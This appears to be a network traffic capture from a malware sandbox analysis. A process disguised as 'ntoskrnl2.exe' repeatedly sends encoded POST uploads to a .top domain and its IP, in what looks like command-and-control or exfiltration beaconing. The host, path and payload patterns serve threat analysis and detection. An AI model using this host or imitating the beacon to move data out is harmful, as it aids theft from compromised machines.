                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:11 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            95 | 192.168.2.6 | 49842 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:35:12.629678965 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:12.980429888 CEST | 1028 | OUT | Data Raw: 55 57 5a 54 5e 42 5c 53 5b 5f 56 5a 57 54 50 59 55 50 5e 43 50 5c 5a 50 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UWZT^B\S[_VZWTPYUP^CP\ZPYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$$=(,%1=Z'=)+-,/$#'?6?8(($?"*^9%^./]+
                                                            Sep 2, 2024 13:35:13.493069887 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:13.494105101 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:12 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ
                                                            Sep 2, 2024 13:35:13.494215965 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:12 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            96 | 192.168.2.6 | 49843 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:35:13.660851002 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:14.009232044 CEST | 1028 | OUT | Data Raw: 55 57 5a 5e 5e 44 5c 56 5b 5f 56 5a 57 5f 50 59 55 58 5e 43 50 53 5a 51 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UWZ^^D\V[_VZW_PYUX^CPSZQYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'X$W:?^<$=Z$>X+-/'Z6<8+($$[>2%:*%^./]+
                                                            Sep 2, 2024 13:35:14.334122896 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:14.465325117 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:13 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            97 | 192.168.2.6 | 49844 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:35:14.605779886 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:15.133904934 CEST | 1028 | OUT | Data Raw: 50 53 5a 51 5e 44 59 54 5b 5f 56 5a 57 54 50 58 55 5e 5e 45 50 59 5a 5d 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PSZQ^DYT[_VZWTPXU^^EPYZ]YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'Y0!+;$'T"'>:(=,4?'<=S<(''=:*%^./]+
                                                            Sep 2, 2024 13:35:15.250412941 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:15.472609043 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:14 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            98 | 192.168.2.6 | 49845 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:35:15.674933910 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:16.056510925 CEST | 1028 | OUT | Data Raw: 50 51 5a 5f 5e 47 5c 54 5b 5f 56 5a 57 5c 50 58 55 5c 5e 48 50 5d 5a 5f 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PQZ_^G\T[_VZW\PXU\^HP]Z_YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$3%?;#X'&3.>=\,B8Z'<)U(W=8X=W!.%^./]+,
                                                            Sep 2, 2024 13:35:16.332412004 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:16.457170010 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:15 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            99 | 192.168.2.6 | 49846 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:35:16.818592072 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1340
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:17.165730953 CEST | 1340 | OUT | Data Raw: 55 57 5a 55 5b 46 5c 57 5b 5f 56 5a 57 54 50 5f 55 5c 5e 42 50 5b 5a 5f 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UWZU[F\W[_VZWTP_U\^BP[Z_YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'[0&?;#\0=X32>>;/ ['%T?;(4+)1.::%^./]+
                                                            Sep 2, 2024 13:35:17.464828968 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:17.593772888 CEST308INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:16 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            100 | 192.168.2.6 | 49847 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:35:16.840890884 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:17.197552919 CEST | 1028 | OUT | encoded request body
                                                            Sep 2, 2024 13:35:17.492552042 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:17.618711948 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:16 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            101 | 192.168.2.6 | 49848 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:35:17.769516945 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:18.118599892 CEST | 1028 | OUT | encoded request body
                                                            Sep 2, 2024 13:35:18.417937040 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:18.541320086 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:17 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            102 | 192.168.2.6 | 49849 | 80.211.144.156 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:35:18.676398993 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:19.025219917 CEST | 1028 | OUT | encoded request body
                                                            Sep 2, 2024 13:35:19.343343019 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:19.473081112 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:18 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            103 | 192.168.2.6 | 49850 | 80.211.144.156 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:35:19.612816095 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:19.962734938 CEST | 1028 | OUT | encoded request body
                                                            Sep 2, 2024 13:35:20.259644985 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:20.385696888 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:19 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            104 | 192.168.2.6 | 49851 | 80.211.144.156 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:35:20.517950058 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:20.868777037 CEST | 1028 | OUT | encoded request body
                                                            Sep 2, 2024 13:35:21.166017056 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:21.292433023 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:20 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            105 | 192.168.2.6 | 49852 | 80.211.144.156 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:35:21.430224895 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:21.774853945 CEST | 1028 | OUT | encoded request body
                                                            Sep 2, 2024 13:35:22.108567953 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:22.243895054 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:21 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            106 | 192.168.2.6 | 49853 | 80.211.144.156 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:35:22.370500088 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:22.728427887 CEST | 1028 | OUT | encoded request body
                                                            Sep 2, 2024 13:35:23.019602060 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:23.265839100 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:22 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            107 | 192.168.2.6 | 49854 | 80.211.144.156 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:35:22.613749981 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1340
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:22.962491989 CEST | 1340 | OUT | encoded request body
                                                            Sep 2, 2024 13:35:23.262326956 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:23.509865999 CEST | 308 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:22 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            108 | 192.168.2.6 | 49855 | 80.211.144.156 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:35:23.397227049 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:23.748497009 CEST | 1028 | OUT | encoded request body
                                                            Sep 2, 2024 13:35:24.059585094 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:24.186649084 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:23 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            109 | 192.168.2.6 | 49857 | 80.211.144.156 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:35:24.309830904 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1024
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:24.668350935 CEST | 1024 | OUT | encoded request body
                                                            Sep 2, 2024 13:35:24.957202911 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:25.164572001 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:24 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            110 | 192.168.2.6 | 49858 | 80.211.144.156 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:35:25.316030025 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:25.665497065 CEST | 1028 | OUT | encoded request body
                                                            Sep 2, 2024 13:35:25.988614082 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:26.117064953 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:25 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            111 | 192.168.2.6 | 49859 | 80.211.144.156 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:35:26.247383118 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:26.613190889 CEST | 1028 | OUT | encoded request body
                                                            Sep 2, 2024 13:35:26.892215014 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:27.017081022 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:26 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            112 | 192.168.2.6 | 49860 | 80.211.144.156 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:35:27.141866922 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:27.493630886 CEST | 1028 | OUT | request body
                                                            Sep 2, 2024 13:35:27.814825058 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:27.950074911 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:27 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            113 | 192.168.2.6 | 49861 | 80.211.144.156 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:35:28.072973967 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:28.431092024 CEST | 1028 | OUT | request body
                                                            Sep 2, 2024 13:35:28.739867926 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:28.872951031 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:28 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            114 | 192.168.2.6 | 49862 | 80.211.144.156 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:35:28.537966967 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1340
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:28.884207964 CEST | 1340 | OUT | request body
                                                            Sep 2, 2024 13:35:29.204227924 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:29.337064028 CEST | 308 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:28 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            115 | 192.168.2.6 | 49863 | 80.211.144.156 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:35:29.000529051 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:29.352982998 CEST | 1028 | OUT | request body
                                                            Sep 2, 2024 13:35:29.670289040 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:29.796789885 CEST | 158 | IN | HTTP/1.1 200 OK
